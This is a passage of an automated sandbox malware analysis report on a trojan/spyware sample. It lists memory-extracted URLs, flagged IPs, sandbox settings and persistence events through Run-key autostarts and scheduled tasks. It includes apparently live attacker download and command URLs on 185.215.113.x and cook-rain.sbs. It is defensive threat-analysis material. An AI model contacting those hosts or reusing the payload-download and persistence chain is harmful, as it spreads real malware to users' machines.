                                                                                                                                                                              https://cook-rain.sbs:443/api7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://mitmdetection.services.mozilla.com/firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  http://anglebug.com/4722chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 00000030.00000003.3219583721.000001E57D183000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://185.215.113.206/68b591d6548ec281/msvcp140.dllWa78a39a396.exe, 0000000A.00000002.3193106380.00000000019B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://shavar.services.mozilla.com/firefox.exe, 00000030.00000003.3106406210.000001E58046F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://firefox.settings.services.mozilla.com/v1i#firefox.exe, 00000030.00000003.3093201942.000001E580493000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://185.215.113.16/off/def.exe7b9f3f6834.exe, 0000000B.00000003.3058822351.0000000001A67000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019EE000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://spocs.getpocket.com/firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://services.addons.mozilla.org/api/v4/abuse/report/addon/firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-ffirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      http://html4/loose.dtd159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://monitor.firefox.com/user/breach-stats?includeResolved=truefirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-reportfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            http://anglebug.com/3502chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://anglebug.com/3623chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://anglebug.com/3625chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://bugzilla.mozilla.org/show_bug.cgi?id=1584464firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://anglebug.com/3624chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://185.215.113.206/c4becf79229cb002.php/sa78a39a396.exe, 0000001E.00000002.3249141713.0000000000B05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://anglebug.com/3862chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://anglebug.com/4836chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://issuetracker.google.com/issues/166475273chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://monitor.firefox.com/aboutfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://account.bellmedia.cfirefox.exe, 00000030.00000003.3224140114.000001E578A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://login.microsoftonline.comfirefox.exe, 00000030.00000003.3224140114.000001E578A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://www.zhihu.com/firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://x1.c.lencr.org/07b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        http://x1.i.lencr.org/07b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          http://anglebug.com/3970chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.all7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              http://.jpg159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 0000001A.00000003.2825201061.0000018D72D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2828031848.0000018D72D25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2826822259.0000018D72D33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://contile.services.mozilla.com/v1/tilesfirefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      http://anglebug.com/5901chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        https://monitor.firefox.com/user/preferencesfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          https://screenshots.firefox.com/firefox.exe, 0000001A.00000003.2821424363.0000018D72757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            http://anglebug.com/3965chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              https://anglebug.com/7161chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                https://gpuweb.github.io/gpuweb/firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  https://anglebug.com/7162chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    http://json-schema.org/draft-07/schema#-firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-reportfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        http://anglebug.com/5906chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          http://anglebug.com/2517chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            http://anglebug.com/4937chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              https://issuetracker.google.com/166809097chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                https://www.olx.pl/firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  http://185.215.113.16/steam/random.exeW/7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    https://lens.google.com/v3/uploadchrome.exe, 00000022.00000003.2874440566.00000828006E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      http://anglebug.com/3832chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        https://www.google.com/complete/firefox.exe, 00000030.00000003.3147455615.000001E57D1FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          https://webextensions.settings.services.mozilla.com/v1firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.tsfirefox.exe, 0000001A.00000003.2899689547.0000018D7CDD4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2896861944.0000018D7CDCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3072593750.000001E57D4C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integrationfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                https://addons.mozilla.org/%LOCALE%/firefox/firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  http://json-schema.org/draft-06/schema#firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    http://anglebug.com/6651chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      https://anglebug.com/4830chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                        https://cook-rain.sbs:443/apirsion.txtPK7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                          https://spocs.getpocket.comfirefox.exe, 00000030.00000003.3147455615.000001E57D1A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                            185.215.113.43
                                                                                                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                                                                            13.107.246.43
                                                                                                                                                                                                                                                                                                            s-part-0015.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                            13.107.246.44
                                                                                                                                                                                                                                                                                                            s-part-0016.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                            151.101.129.91
                                                                                                                                                                                                                                                                                                            services.addons.mozilla.orgUnited States
                                                                                                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                            34.117.188.166
                                                                                                                                                                                                                                                                                                            contile.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                                                            139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                                                                            142.250.186.132
                                                                                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            34.120.208.123
                                                                                                                                                                                                                                                                                                            telemetry-incoming.r53-2.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            31.41.244.11
                                                                                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                                                                                            61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                                                                                            142.250.185.68
                                                                                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            142.250.186.36
                                                                                                                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            34.149.100.209
                                                                                                                                                                                                                                                                                                            prod.remote-settings.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                                            2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                                                                            185.215.113.16
                                                                                                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                                                                            34.107.243.93
                                                                                                                                                                                                                                                                                                            push.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            34.107.221.82
                                                                                                                                                                                                                                                                                                            prod.detectportal.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            216.58.206.46
                                                                                                                                                                                                                                                                                                            youtube.comUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            35.244.181.201
                                                                                                                                                                                                                                                                                                            prod.balrog.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                                                                                                                            cook-rain.sbsEuropean Union
                                                                                                                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                            185.215.113.206
                                                                                                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                                                                            34.116.198.130
                                                                                                                                                                                                                                                                                                            home.fvtekk5pn.topUnited States
                                                                                                                                                                                                                                                                                                            139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                                                                                                                                                                                                                                                            35.190.72.216
                                                                                                                                                                                                                                                                                                            prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                            34.160.144.191
                                                                                                                                                                                                                                                                                                            prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                                            2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                                                                                            192.168.2.4
                                                                                                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                            Analysis ID:1560104
                                                                                                                                                                                                                                                                                                            Start date and time:2024-11-21 12:08:06 +01:00
                                                                                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                            Overall analysis duration:0h 21m 38s
                                                                                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                            Number of analysed new started processes analysed:59
                                                                                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                                                                                            Sample name:file.exe
                                                                                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@138/68@97/24
                                                                                                                                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                                            • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 172.217.23.99, 142.250.185.110, 142.250.110.84, 64.233.167.84, 142.250.186.174, 34.104.35.123, 35.80.238.59, 52.12.64.98, 35.164.125.63, 184.28.89.167, 142.250.186.67, 142.250.186.46, 64.233.166.84, 88.221.170.101, 2.22.61.59, 2.22.61.56, 142.250.185.142, 20.42.65.84, 142.250.186.142, 216.58.212.174, 172.217.16.202, 142.250.185.202, 104.208.16.89, 172.217.16.195, 142.250.185.238, 216.58.206.42, 142.250.186.42, 142.250.186.106, 172.217.18.10, 142.250.186.74, 172.217.16.138, 142.250.185.74, 142.250.186.138, 216.58.212.138, 142.250.184.234, 142.250.74.202, 142.250.184.202, 142.250.185.106, 216.58.206.74, 142.250.181.234, 95.101.150.2, 13.74.129.1, 20.42.73.28, 13.107.21.237, 204.79.197.237, 52.168.117.171, 92.122.145.152, 20.189.173.17
                                                                                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdwus22.westus.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, aus5.mozilla.org, learn.microsoft.com, e11290.dspg.akamaiedge.net, a19.dscg10.akamai.net, clients2.google.com, ocsp.digicert.com, login.live.com, star-azurefd-prod.trafficmanager.net, learn.microsoft.com.edgekey.net, onedscolprdeus02.eastus.cloudapp.azure.com, update.googleapis.com, fs.microsoft.com, shavar.prod.mozaws.net, content-autofill.googleapis.com, c-bing-com.dual-a-0034.a-msedge.net, learn.microsoft.com.edgekey.net.globalredir.akadns.net, edgedl.me.gvt1.com, c.bing.com, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com, ciscobinary.openh264.org, c-msn-com-nsatc.trafficmanager.net, incoming.telemetry.mozilla.org, a17.rackcdn.com.mdc.edgesuite.net, go.microsoft.com, redirector.gvt1.com, onedscolprdcus11.centralus.cloudapp.azure.com, onedscolprdeus16.eastus.cloudapp.azure.com, saf
                                                                                                                                                                                                                                                                                                            • Execution Graph export aborted for target 7b9f3f6834.exe, PID 2896 because there are no executed function
                                                                                                                                                                                                                                                                                                            • Execution Graph export aborted for target 7b9f3f6834.exe, PID 7968 because there are no executed function
                                                                                                                                                                                                                                                                                                            • Execution Graph export aborted for target a78a39a396.exe, PID 7920 because there are no executed function
                                                                                                                                                                                                                                                                                                            • Execution Graph export aborted for target file.exe, PID 7512 because it is empty
                                                                                                                                                                                                                                                                                                            • Execution Graph export aborted for target skotes.exe, PID 7704 because there are no executed function
                                                                                                                                                                                                                                                                                                            • Execution Graph export aborted for target skotes.exe, PID 7816 because there are no executed function
                                                                                                                                                                                                                                                                                                            • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                            • VT rate limit hit for: file.exe
                                                                                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                                                                                            06:10:03API Interceptor15261646x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                                                                            06:10:32API Interceptor196x Sleep call for process: 7b9f3f6834.exe modified
                                                                                                                                                                                                                                                                                                            06:10:52API Interceptor825764x Sleep call for process: 159c892ab5.exe modified
                                                                                                                                                                                                                                                                                                            06:10:52API Interceptor490x Sleep call for process: a78a39a396.exe modified
                                                                                                                                                                                                                                                                                                            06:11:37API Interceptor1x Sleep call for process: firefox.exe modified
                                                                                                                                                                                                                                                                                                            11:09:03Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            11:10:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 7b9f3f6834.exe C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            11:10:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a78a39a396.exe C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            11:10:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run aca7749dee.exe C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe
                                                                                                                                                                                                                                                                                                            11:10:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 76dd304e1d.exe C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe
                                                                                                                                                                                                                                                                                                            11:11:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 7b9f3f6834.exe C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            11:11:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a78a39a396.exe C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            11:11:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run aca7749dee.exe C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe
                                                                                                                                                                                                                                                                                                            11:11:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 76dd304e1d.exe C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe
                                                                                                                                                                                                                                                                                                            11:12:19Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                            11:17:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 81bf2ec599.exe C:\Users\user\AppData\Local\Temp\1007918001\81bf2ec599.exe
                                                                                                                                                                                                                                                                                                            11:17:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4493005e65.exe C:\Users\user\AppData\Local\Temp\1007919001\4493005e65.exe
                                                                                                                                                                                                                                                                                                            11:17:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f312bd52d3.exe C:\Users\user\AppData\Local\Temp\1007920001\f312bd52d3.exe
                                                                                                                                                                                                                                                                                                            11:18:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ce44784d73.exe C:\Users\user\AppData\Local\Temp\1007921001\ce44784d73.exe
                                                                                                                                                                                                                                                                                                            11:18:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 81bf2ec599.exe C:\Users\user\AppData\Local\Temp\1007918001\81bf2ec599.exe
                                                                                                                                                                                                                                                                                                            No context
